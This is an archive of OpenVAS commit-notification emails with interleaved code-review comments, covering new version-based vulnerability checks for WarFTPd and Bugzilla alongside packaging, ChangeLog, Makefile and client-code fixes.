16:57:31 UTC (rev 5349) 
@@ -0,0 +1,99 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# WarFTPD Multiple Format String Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100282); + script_bugtraq_id(20944); + script_cve_id("CVE-2006-5789"); + script_version ("1.0-$Revision$"); + + script_name("WarFTPD Multiple Format String Vulnerabilities"); + +desc = "Overview: +WarFTPd is prone to multiple remote format-string vulnerabilities +because the application fails to sanitize user-supplied input before +passing it to a formatted-output function. + +An attacker can exploit these issues to crash the server and possibly +to execute arbitrary code within the context of the server, but this +has not been confirmed. + +WarFTPd 1.82.00-RC11 is reported vulnerable; prior versions may be +vulnerable as well. + +Solution: +Updates are available. Please see the references for details. 
+ +References: +http://www.securityfocus.com/bid/20944 +http://support.jgaa.com/index.php?MenuPage=product +http://www.securityfocus.com/archive/1/506443 +http://www.securityfocus.com/archive/1/450804 + + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if WarFTPd version is WarFTPd 1.82.00-RC11"); + script_category(ACT_GATHER_INFO); + script_family("FTP"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl"); + script_require_ports("Services/ftp", 21); + exit(0); +} + +include("ftp_func.inc"); +include("version_func.inc"); + +port = get_kb_item("Services/ftp"); +if(!port){ + port = 21; +} + +if(get_kb_item('ftp/'+port+'/broken'))exit(0); + +if(!get_port_state(port)){ + exit(0); +} + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +banner = ftp_recv_line(socket:soc); +if(!banner)exit(0); + +if(!version = eregmatch(string: banner, pattern:"WarFTPd ([0-9.]+[-RC0-9]*)"))exit(0); +version[1] = ereg_replace(pattern:"-", string:version[1], replace:"."); + +if(version_is_equal(version: version[1], test_version:"1.82.00.RC11") || + version_is_equal(version: version[1], test_version:"1.82.00.RC12")) { + security_warning(port:port); + exit(0); +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/warftpd_20944.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Thu Oct 1 21:02:19 2009 
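Review bot: in postgreSQL_multiple_security_vulnerabilities.nasl the version is fetched with get_kb_list(string("PostgreSQL/Remote/", port, "/Ver")), which returns a list, yet ver is then handed to every version_in_range() call as if it were a single version string. get_kb_item() looks like what was intended here; with the list form the comparisons are not evaluated against the detected version.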
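Review bot: in warftpd_20944.nasl the final test also reports 1.82.00.RC12, while script_summary and the description name only 1.82.00-RC11. Either state in the description that RC12 is covered or drop the second version_is_equal(). The socket returned by open_sock_tcp(port) is also never closed on any of the exit paths after the banner is read; a close(soc) directly after ftp_recv_line() would cover all of them.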
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 21:02:19 +0200 (CEST) Subject: [Openvas-commits] r5350 - in trunk/openvas-plugins: . scripts Message-ID: <20091001190219.885AC85C72E9@pyrosoma.intevation.org> Author: reinke Date: 2009-10-01 21:02:17 +0200 (Thu, 01 Oct 2009) New Revision: 5350 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl Log: Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-01 16:57:31 UTC (rev 5349) +++ trunk/openvas-plugins/ChangeLog 2009-10-01 19:02:17 UTC (rev 5350) @@ -1,3 +1,7 @@ +2009-10-01 Thomas Reinke + * scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl: + Fix typo. + 2009-10-01 Michael Meyer * scripts/BigAnt_36407.nasl, Modified: trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl 2009-10-01 16:57:31 UTC (rev 5349) +++ trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl 2009-10-01 19:02:17 UTC (rev 5350) @@ -30,7 +30,7 @@ script_version("$Revision: 1.0 $"); script_cve_id("CVE-2009-3114"); script_bugtraq_id(36305); - script_name("IBM Lotus Notes RSS Reader Widget HTML Injection Vulneriability (Win)"); + script_name("IBM Lotus Notes RSS Reader Widget HTML Injection Vulnerability (Win)"); desc = " Overview: This host has IBM Lotus Notes installed and is prone to HTML Injection vulnerability. From scm-commit at wald.intevation.org Thu Oct 1 21:46:47 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 21:46:47 +0200 (CEST) Subject: [Openvas-commits] r5351 - trunk/openvas-packaging/openvas-libraries/debian/trunk/debian Message-ID: <20091001194647.9785F852F3D8@pyrosoma.intevation.org> Author: jan Date: 2009-10-01 21:46:46 +0200 (Thu, 01 Oct 2009) New Revision: 5351 Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/libopenvas3.install Log: * libopenvas3.install: fixed pattern (spotted by Christopher Bertels) Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-01 19:02:17 UTC (rev 5350) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/changelog 2009-10-01 19:46:46 UTC (rev 5351) @@ -3,6 +3,7 @@ * New upstream release. * rules: Fixed "major" release for libs. * libopenvas3.dirs: fixed path (libopenvas2 -> libopenvas3). + * libopenvas3.install: fixed pattern (spotted by Christopher Bertels) -- Jan-Oliver Wagner Mon, 28 Sep 2009 15:22:04 +0200 Modified: trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/libopenvas3.install =================================================================== --- trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/libopenvas3.install 2009-10-01 19:02:17 UTC (rev 5350) +++ trunk/openvas-packaging/openvas-libraries/debian/trunk/debian/libopenvas3.install 2009-10-01 19:46:46 UTC (rev 5351) @@ -1 +1 @@ -usr/lib/libopenvas*so* +usr/lib/lib*.so.* From scm-commit at wald.intevation.org Thu Oct 1 22:42:16 2009 
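Review bot: the new pattern usr/lib/lib*.so.* in libopenvas3.install drops the libopenvas prefix along with the unversioned .so match, so the package now picks up every versioned shared object staged under usr/lib, not only the OpenVAS ones. If the intent was only to stop shipping the unversioned .so links, usr/lib/libopenvas*.so.* keeps the previous scope.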
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 22:42:16 +0200 (CEST) Subject: [Openvas-commits] r5352 - trunk/doc/website Message-ID: <20091001204216.334ED8523D4B@pyrosoma.intevation.org> Author: jan Date: 2009-10-01 22:42:15 +0200 (Thu, 01 Oct 2009) New Revision: 5352 Modified: trunk/doc/website/team_tasks.htm4 Log: Added Christian Edjenguele as co-maintainer for -devel and -discuss mailing lists. Modified: trunk/doc/website/team_tasks.htm4 =================================================================== --- trunk/doc/website/team_tasks.htm4 2009-10-01 19:46:46 UTC (rev 5351) +++ trunk/doc/website/team_tasks.htm4 2009-10-01 20:42:15 UTC (rev 5352) @@ -101,12 +101,12 @@ Mailing List Admin openvas-devel Jan-Oliver Wagner - Vacant (you?) + Christian Edjenguele Mailing List Admin openvas-discuss Jan-Oliver Wagner - Vacant (you?) + Christian Edjenguele Mailing List Admin openvas-distro From scm-commit at wald.intevation.org Thu Oct 1 22:44:47 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 22:44:47 +0200 (CEST) Subject: [Openvas-commits] r5353 - trunk/doc/website Message-ID: <20091001204447.A85A4852B6F9@pyrosoma.intevation.org> Author: jan Date: 2009-10-01 22:44:47 +0200 (Thu, 01 Oct 2009) New Revision: 5353 Modified: trunk/doc/website/team_tasks.htm4 Log: Added Geoff Galitz as bug tracker maintainer. Modified: trunk/doc/website/team_tasks.htm4 =================================================================== --- trunk/doc/website/team_tasks.htm4 2009-10-01 20:42:15 UTC (rev 5352) +++ trunk/doc/website/team_tasks.htm4 2009-10-01 20:44:47 UTC (rev 5353) @@ -60,7 +60,7 @@ Bug Tracker - Vacant (you?) + Geoff Galitz Felix Wolfsteller From scm-commit at wald.intevation.org Fri Oct 2 12:27:36 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 2 Oct 2009 12:27:36 +0200 (CEST) Subject: [Openvas-commits] r5354 - trunk/tools/openvas-lsc-target-preparation Message-ID: <20091002102736.38001861EAA1@pyrosoma.intevation.org> Author: felix Date: 2009-10-02 12:27:35 +0200 (Fri, 02 Oct 2009) New Revision: 5354 Modified: trunk/tools/openvas-lsc-target-preparation/Changelog trunk/tools/openvas-lsc-target-preparation/MANIFEST trunk/tools/openvas-lsc-target-preparation/Makefile Log: Fixed a bug. Output of ls differs in ordering depending on the locale. In the Makefile, the diff command compares ls output with MANIFEST, leading to wrong results if these files are sorted differently. Found in cooperation with Matthew Mundell. * MANIFEST: Sorted "traditionally". * Makefile: Set locale to have the ls command sort "traditionally". Modified: trunk/tools/openvas-lsc-target-preparation/Changelog =================================================================== --- trunk/tools/openvas-lsc-target-preparation/Changelog 2009-10-01 20:44:47 UTC (rev 5353) +++ trunk/tools/openvas-lsc-target-preparation/Changelog 2009-10-02 10:27:35 UTC (rev 5354) @@ -1,3 +1,14 @@ +2009-10-02 Felix Wolfsteller + + Fixed a bug. Output of ls differs in ordering depending on the locale. + In the Makefile, the diff command compares ls output with MANIFEST, + leading to wrong results if these files are sorted differently. + Found in cooperation with Matthew Mundell. + + * MANIFEST: Sorted "traditionally". + + * Makefile: Set locale to have the ls command sort "traditionally". + 2009-09-23 Felix Wolfsteller * create-rpm.sh: Fixed bashism. Modified: trunk/tools/openvas-lsc-target-preparation/MANIFEST =================================================================== --- trunk/tools/openvas-lsc-target-preparation/MANIFEST 2009-10-01 20:44:47 UTC (rev 5353) +++ trunk/tools/openvas-lsc-target-preparation/MANIFEST 2009-10-02 10:27:35 UTC (rev 5354) 
@@ -1,14 +1,14 @@ Changelog -configure -create-rpm.sh -lsc-pubkey.pub +MANIFEST Makefile -makeself-2.1.5 -MANIFEST NAME -openvas-lsc-target.spec.in PUBKEYNAME README RPMBASENAME TODO VERSION +configure +create-rpm.sh +lsc-pubkey.pub +makeself-2.1.5 +openvas-lsc-target.spec.in \ No newline at end of file Modified: trunk/tools/openvas-lsc-target-preparation/Makefile =================================================================== --- trunk/tools/openvas-lsc-target-preparation/Makefile 2009-10-01 20:44:47 UTC (rev 5353) +++ trunk/tools/openvas-lsc-target-preparation/Makefile 2009-10-02 10:27:35 UTC (rev 5354) @@ -23,7 +23,7 @@ cp lsc-pubkey.pub $(RPM_BUILD_ROOT)/home/$(PUBKEYNAME)/.ssh/authorized_keys clean: - ls | egrep -v "\.spec" | diff MANIFEST - | grep "^>" | sed 's/^..//' | xargs rm -rf + LC_ALL=C ls | egrep -v "\.spec" | diff MANIFEST - | grep "^>" | sed 's/^..//' | xargs rm -rf # The default pubkey is used as an example, to test the building # system locally. An RPM should be generated. From scm-commit at wald.intevation.org Fri Oct 2 12:33:54 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 2 Oct 2009 12:33:54 +0200 (CEST) Subject: [Openvas-commits] r5355 - trunk/tools/openvas-lsc-target-preparation Message-ID: <20091002103354.15679861EAA2@pyrosoma.intevation.org> Author: mattm Date: 2009-10-02 12:33:53 +0200 (Fri, 02 Oct 2009) New Revision: 5355 Modified: trunk/tools/openvas-lsc-target-preparation/Changelog trunk/tools/openvas-lsc-target-preparation/MANIFEST Log: * MANIFEST: Add newline at end of file. Modified: trunk/tools/openvas-lsc-target-preparation/Changelog =================================================================== --- trunk/tools/openvas-lsc-target-preparation/Changelog 2009-10-02 10:27:35 UTC (rev 5354) +++ trunk/tools/openvas-lsc-target-preparation/Changelog 2009-10-02 10:33:53 UTC (rev 5355) 
@@ -1,3 +1,7 @@ +2009-10-02 Matthew Mundell + + * MANIFEST: Add newline at end of file. + 2009-10-02 Felix Wolfsteller Fixed a bug. Output of ls differs in ordering depending on the locale. @@ -16,21 +20,21 @@ 2009-05-06 Felix Wolfsteller * openvas-lsc-target.spec.in: Delete user when package is uninstalled. - + * TODO: Todos added (what happens if user exists, expire- date?). 2009-04-24 Felix Wolfsteller * README: Corrected words about suggested invocation. - + * create-rpm.sh: Removed three parameter version. If the makeself-generated script is called exactly as described in the README it is not needed, argument count will be 1 and not 3. - + 2009-04-24 Felix Wolfsteller * README: Added words about suggested invocation. - + * TODO: Need to remove the user when package is uninstalled. 2009-04-24 Felix Wolfsteller Modified: trunk/tools/openvas-lsc-target-preparation/MANIFEST =================================================================== --- trunk/tools/openvas-lsc-target-preparation/MANIFEST 2009-10-02 10:27:35 UTC (rev 5354) +++ trunk/tools/openvas-lsc-target-preparation/MANIFEST 2009-10-02 10:33:53 UTC (rev 5355) @@ -11,4 +11,4 @@ create-rpm.sh lsc-pubkey.pub makeself-2.1.5 -openvas-lsc-target.spec.in \ No newline at end of file +openvas-lsc-target.spec.in From scm-commit at wald.intevation.org Fri Oct 2 13:02:31 2009 
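Review bot: on the r5354 Makefile clean rule, LC_ALL=C fixes the ordering of ls, but the rule still removes whatever diff reports as extra (grep "^>" ... | xargs rm -rf), so it is only correct while MANIFEST is kept by hand in C-locale order; one misplaced entry and a tracked file is deleted. Sorting MANIFEST with LC_ALL=C sort before the diff would remove that dependency. Because the names pass through plain xargs, a file name containing whitespace would also be split into several rm -rf arguments.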
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 2 Oct 2009 13:02:31 +0200 (CEST) Subject: [Openvas-commits] r5356 - in trunk/openvas-client: . openvas/prefs_dialog Message-ID: <20091002110231.343D7861EABD@pyrosoma.intevation.org> Author: felix Date: 2009-10-02 13:02:29 +0200 (Fri, 02 Oct 2009) New Revision: 5356 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/prefs_dialog/prefs_context.c trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c Log: * openvas/prefs_dialog/prefs_dialog_auth.c (prefs_dialog_auth_connect_dialog): Initialize variables with NULL. * openvas/prefs_dialog/prefs_context.c (prefs_context_update_widgets): Guard CONTEXT_SERVER which is only defined if configured with --enable-omp. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-02 10:33:53 UTC (rev 5355) +++ trunk/openvas-client/ChangeLog 2009-10-02 11:02:29 UTC (rev 5356) @@ -1,3 +1,12 @@ +2009-10-02 Felix Wolfsteller + + * openvas/prefs_dialog/prefs_dialog_auth.c + (prefs_dialog_auth_connect_dialog): Initialize variables with NULL. + + * openvas/prefs_dialog/prefs_context.c (prefs_context_update_widgets): + Guard CONTEXT_SERVER which is only defined if configured with + --enable-omp. + 2009-09-30 Matthew Mundell * openvas/prefs_dialog/prefs_dialog.c (prefs_dialog_setup): Only define Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_context.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_context.c 2009-10-02 10:33:53 UTC (rev 5355) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_context.c 2009-10-02 11:02:29 UTC (rev 5356) 
@@ -91,7 +91,11 @@ #endif /* undefined DISABLE_OTP */ prefs_context_enable_widget("EXECSCOPE_MENUITEM", type >= CONTEXT_SCOPE && action == CONTEXT_IDLE ); - prefs_context_enable_widget("NEWSCOPE_MENUITEM", type >= CONTEXT_TASK || type == CONTEXT_SERVER); + prefs_context_enable_widget("NEWSCOPE_MENUITEM", type >= CONTEXT_TASK +#ifdef USE_OMP + || type == CONTEXT_SERVER +#endif + ); prefs_context_enable_widget("RENAMESCOPE_MENUITEM", type >= CONTEXT_SCOPE); prefs_context_enable_widget("DELETESCOPE_MENUITEM", type >= CONTEXT_SCOPE); Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c 2009-10-02 10:33:53 UTC (rev 5355) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_dialog_auth.c 2009-10-02 11:02:29 UTC (rev 5356) @@ -525,7 +525,8 @@ if(gtk_dialog_run(GTK_DIALOG(auth->dialog)) == GTK_RESPONSE_OK) { #ifdef USE_OMP - struct context *original_context, *manager; + struct context *original_context = NULL; + struct context *manager = NULL; #endif const char *hostname; int port; From scm-commit at wald.intevation.org Fri Oct 2 13:10:28 2009 
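Review bot: in prefs_context_update_widgets the #ifdef USE_OMP block now sits inside the argument list of the prefs_context_enable_widget("NEWSCOPE_MENUITEM", ...) call. That is hard to read, and it is undefined behaviour if prefs_context_enable_widget is ever turned into a function-like macro. Computing the condition into a local variable above the call, with the "|| type == CONTEXT_SERVER" part under the #ifdef, keeps the guard and the call separate.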
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 2 Oct 2009 13:10:28 +0200 (CEST) Subject: [Openvas-commits] r5357 - in trunk/openvas-client: . include src/gui src/util Message-ID: <20091002111028.D3F27861EAA2@pyrosoma.intevation.org> Author: felix Date: 2009-10-02 13:10:27 +0200 (Fri, 02 Oct 2009) New Revision: 5357 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/include/config.h.in trunk/openvas-client/src/gui/nvt_pref_sshlogin.h trunk/openvas-client/src/util/openvas_ssh_key_create.c Log: * include/config.h.in: Set ENABLE_SAFE_TESTS to 0. * src/gui/nvt_prefs_sshlogin.h, src/util/openvas_ssh_key_create.c: Include config.h to include exactly the same context as in other places. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-02 11:02:29 UTC (rev 5356) +++ trunk/openvas-client/ChangeLog 2009-10-02 11:10:27 UTC (rev 5357) @@ -1,5 +1,12 @@ 2009-10-02 Felix Wolfsteller + * include/config.h.in: Set ENABLE_SAFE_TESTS to 0. + + * src/gui/nvt_prefs_sshlogin.h, src/util/openvas_ssh_key_create.c: + Include config.h to include exactly the same context as in other places. + +2009-10-02 Felix Wolfsteller + * openvas/prefs_dialog/prefs_dialog_auth.c (prefs_dialog_auth_connect_dialog): Initialize variables with NULL. Modified: trunk/openvas-client/include/config.h.in =================================================================== --- trunk/openvas-client/include/config.h.in 2009-10-02 11:02:29 UTC (rev 5356) +++ trunk/openvas-client/include/config.h.in 2009-10-02 11:10:27 UTC (rev 5357) 
@@ -254,7 +254,7 @@ /* * Experimental features */ -#define ENABLE_SAVE_TESTS 1 +#define ENABLE_SAVE_TESTS 0 #define ENABLE_SAVE_KB 1 /* * Local Variables: Modified: trunk/openvas-client/src/gui/nvt_pref_sshlogin.h =================================================================== --- trunk/openvas-client/src/gui/nvt_pref_sshlogin.h 2009-10-02 11:02:29 UTC (rev 5356) +++ trunk/openvas-client/src/gui/nvt_pref_sshlogin.h 2009-10-02 11:10:27 UTC (rev 5357) @@ -28,6 +28,10 @@ #ifdef USE_GTK +/** @todo Remove dependence of config.h (some defines influence member variables + * of struct context in context.h) */ +#include "config.h" /* to have ENABLE_SAVE_TESTS defined before including the + context */ #include "context.h" void nvt_pref_sshlogin_add (GtkWidget* vbox, struct arglist* pref); Modified: trunk/openvas-client/src/util/openvas_ssh_key_create.c =================================================================== --- trunk/openvas-client/src/util/openvas_ssh_key_create.c 2009-10-02 11:02:29 UTC (rev 5356) +++ trunk/openvas-client/src/util/openvas_ssh_key_create.c 2009-10-02 11:10:27 UTC (rev 5357) @@ -37,6 +37,10 @@ #include "openvas_i18n.h" #include "error_dlg.h" +/** @todo Remove dependence of config.h (some defines influence member variables + * of struct context in context.h) */ +#include "config.h" /* to have ENABLE_SAVE_TESTS defined before including the + context */ #include "context.h" From scm-commit at wald.intevation.org Fri Oct 2 19:48:18 2009 
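Review bot: the log and ChangeLog entry say ENABLE_SAFE_TESTS was set to 0, but the define changed in config.h.in is ENABLE_SAVE_TESTS, and the ChangeLog names src/gui/nvt_prefs_sshlogin.h where the modified file is nvt_pref_sshlogin.h. Please correct both names in the ChangeLog so the entry can be found by searching for the real identifier, and note why the experimental feature is being switched off.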
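Review bot: adding #include "config.h" ahead of context.h in nvt_pref_sshlogin.h and openvas_ssh_key_create.c fixes these two files only. As the new @todo says, ENABLE_SAVE_TESTS influences the member variables of struct context, so any other file that includes context.h without config.h still sees a different struct layout. Including config.h from context.h itself would make the layout consistent in every translation unit.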
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 2 Oct 2009 19:48:18 +0200 (CEST) Subject: [Openvas-commits] r5358 - in trunk/openvas-plugins: . scripts Message-ID: <20091002174818.7044B861EAC3@pyrosoma.intevation.org> Author: mime Date: 2009-10-02 19:48:14 +0200 (Fri, 02 Oct 2009) New Revision: 5358 Added: trunk/openvas-plugins/scripts/bugzilla_36371.nasl trunk/openvas-plugins/scripts/bugzilla_36373.nasl trunk/openvas-plugins/scripts/cerberus_ftp_server_36390.nasl trunk/openvas-plugins/scripts/photopost_detect.nasl trunk/openvas-plugins/scripts/webmirror.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/misc_func.inc trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl Log: Added new plugins. Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/ChangeLog 2009-10-02 17:48:14 UTC (rev 5358) @@ -1,3 +1,20 @@ +2009-10-02 Michael Meyer + + * scripts/photopost_detect.nasl, + scripts/bugzilla_36373.nasl, + scripts/cerberus_ftp_server_36390.nasl, + scripts/bugzilla_36371.nasl, + scripts/webmirror.nasl: + Added new plugins. + + * scripts/sambar_cgi_path_disclosure.nasl, + scripts/ypupdated_remote_exec.nasl, + scripts/secpod_surgemail_detect.nasl: + Bugfixes. + + * scripts/misc_func.inc: + Added function get_unknown_svc(). + 2009-10-01 Thomas Reinke * scripts/secpod_ibm_lotus_notes_html_inj_vuln_win.nasl: Fix typo. Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/cve_current.txt 2009-10-02 17:48:14 UTC (rev 5358) 
@@ -99,3 +99,6 @@ 36554 Greenbone svn R 36490 Greenbone svn R CVE-2009-3103 Greenbone svn R +CVE-2009-3125 Greenbone svn R +36390 Greenbone svn R +CVE-2009-3165 Greenbone svn R Added: trunk/openvas-plugins/scripts/bugzilla_36371.nasl =================================================================== --- trunk/openvas-plugins/scripts/bugzilla_36371.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/bugzilla_36371.nasl 2009-10-02 17:48:14 UTC (rev 5358) 
@@ -0,0 +1,93 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100286); + script_bugtraq_id(36371); + script_cve_id("CVE-2009-3125"); + script_version ("1.0-$Revision$"); + + script_name("Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability"); + +desc = "Overview: +Bugzilla is prone to an SQL-injection vulnerability because it fails +to sufficiently sanitize user-supplied data before using it in an SQL +query. + +Exploiting this issue could allow an attacker to compromise the +application, access or modify data, or exploit latent vulnerabilities +in the underlying database. + +The following versions are affected: + +Bugzilla 3.3.2 through 3.4.1 Bugzilla 3.5 + +Solution: +Updates are available. Please see the references for details. 
+ +References: +http://www.securityfocus.com/bid/36371 +https://bugzilla.mozilla.org/show_bug.cgi?id=515191 +http://www.bugzilla.org/security/3.0.8/ +http://www.bugzilla.org + + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Bugzilla is prone to an SQL-injection vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("bugzilla_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if (!can_host_php(port:port)) exit(0); + +if(!version = get_kb_item(string("www/", port, "/bugzilla/version")))exit(0); + +if(!isnull(version) && version >!< "unknown") { + + if(version_in_range(version:version, test_version:"3.4", test_version2:"3.4.1") || + version_in_range(version:version, test_version:"3.3", test_version2:"3.3.4") || + version_is_equal(version:version, test_version:"3.5")) { + security_warning(port:port); + exit(0); + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/bugzilla_36371.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/bugzilla_36373.nasl =================================================================== --- trunk/openvas-plugins/scripts/bugzilla_36373.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/bugzilla_36373.nasl 2009-10-02 17:48:14 UTC (rev 5358) 
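Review bot: in bugzilla_36371.nasl the line "if (!can_host_php(port:port)) exit(0);" makes the check exit on web servers without PHP, but Bugzilla is a Perl application, so this gate can only cause missed detections and should be removed. The ranges also start lower than the description: test_version:"3.3" includes 3.3 and 3.3.1, although the text lists 3.3.2 through 3.4.1 as affected.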
@@ -0,0 +1,97 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100287); + script_bugtraq_id(36373); + script_cve_id("CVE-2009-3165"); + script_version ("1.0-$Revision$"); + + script_name("Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability"); + +desc = "Overview: +Bugzilla is prone to an SQL-injection vulnerability because it fails +to sufficiently sanitize user-supplied data before using it in an SQL +query. + +Exploiting this issue could allow an attacker to compromise the +application, access or modify data, or exploit latent vulnerabilities +in the underlying database. + +The following versions are vulnerable: + +Bugzilla 2.23.4 through 3.0.8 Bugzilla 3.1.1 through 3.2.4 Bugzilla +3.3.1 through 3.4.1 + +Solution: +Updates are available. Please see the references for details. 
+ +References: +http://www.securityfocus.com/bid/36373 +https://bugzilla.mozilla.org/show_bug.cgi?id=515191 +http://www.bugzilla.org/security/3.0.8/ +http://www.bugzilla.org + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Bugzilla is prone to an SQL-injection vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("bugzilla_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if (!can_host_php(port:port)) exit(0); + +if(!version = get_kb_item(string("www/", port, "/bugzilla/version")))exit(0); +if(!isnull(version) && version >!< "unknown") { + + if( + version_in_range(version:version, test_version:"3.4", test_version2:"3.4.1") || + version_in_range(version:version, test_version:"3.3", test_version2:"3.3.4") || + version_in_range(version:version, test_version:"3.2", test_version2:"3.2.4") || + version_in_range(version:version, test_version:"3.1", test_version2:"3.1.4") || + version_in_range(version:version, test_version:"3.0", test_version2:"3.0.8") || + version_in_range(version:version, test_version:"2.23", test_version2:"2.23.4") || + version_in_range(version:version, test_version:"2.4", test_version2:"2.9")) { + security_warning(port:port); + exit(0); + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/bugzilla_36373.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: 